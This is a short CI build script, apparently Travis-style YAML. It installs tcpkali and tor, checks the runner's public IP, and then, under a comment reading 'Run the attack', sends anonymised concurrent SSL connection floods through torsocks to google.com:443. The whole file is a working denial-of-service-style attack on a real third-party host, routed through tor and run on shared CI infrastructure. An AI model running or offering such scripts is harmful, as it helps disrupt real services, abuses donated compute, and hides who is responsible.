script:
  # Install tcpkali
  - git clone https://github.com/satori-com/tcpkali.git
  - cd tcpkali
  - autoreconf -iv && ./configure
  - sudo make install

  # Setup tor, torsocks
  - sudo apt-get install tor
  - sudo service tor start
  - sudo apt-get install torsocks

  # Run the attack
  - sudo curl http://ip-api.com
  - sudo torsocks --isolate tcpkali --connections=10 --ssl --duration=30s --message="   " --message-rate=5 google.com:443
